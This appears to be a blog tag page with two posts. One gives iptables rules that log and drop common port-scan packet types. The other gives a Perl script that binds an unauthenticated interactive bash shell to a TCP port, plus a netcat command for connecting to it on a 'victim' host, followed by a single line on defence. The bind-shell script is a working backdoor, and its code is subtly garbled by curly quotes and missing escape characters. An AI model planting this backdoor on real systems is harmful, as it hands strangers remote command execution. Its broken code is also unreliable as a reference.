Posts Tagged ‘Port’
Block Port Scanning With Iptables
I wrote down some rules to block commonly used port scanning technique. The rules are below:
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j LOG \
--log-prefix "NMAP-XMAS SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j LOG \
--log-prefix "NMAP-NULL SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j LOG \
--log-prefix "SYN/RST SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,FIN SYN,FIN -j LOG \
--log-prefix "SYN/FIN SCAN:" --log-tcp-options --log-ip-options
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
$IPTABLES -t mangle -A PREROUTING -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
Bind bash to a port
I write a simple perl script to bind bash to a port:
#!/usr/bin/perl
use Socket;
my $port = shift || 2345;
my $proto = getprotobyname('tcp');
($port) = $port =~ /^(d+)$/ or die "invalid port";
socket(S,PF_INET,SOCK_STREAM,$proto) || die "socket: $!";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,pack("l",1)) || die "setsockopt: $!";
bind(S,sockaddr_in($port,INADDR_ANY)) || die "bind: $!";
listen(S,3) || die "listen: $!";
my $shell="/bin/bash -i";
while(1) {
accept(C,S);
if(!($pid=fork)) {
die "Cannot fork" if (!defined $pid);
open STDIN,"<&C";
open STDOUT,">&C”;
open STDERR, “>&C”;
exec $shell || die print C “Cant execute $shelln”;
close C;
exit 0;
}
}
And then you can use netcat to connect it:
nc -vv victim.com 2345
How to protect from this attack
The simplest way is using firewall disable all unused ports.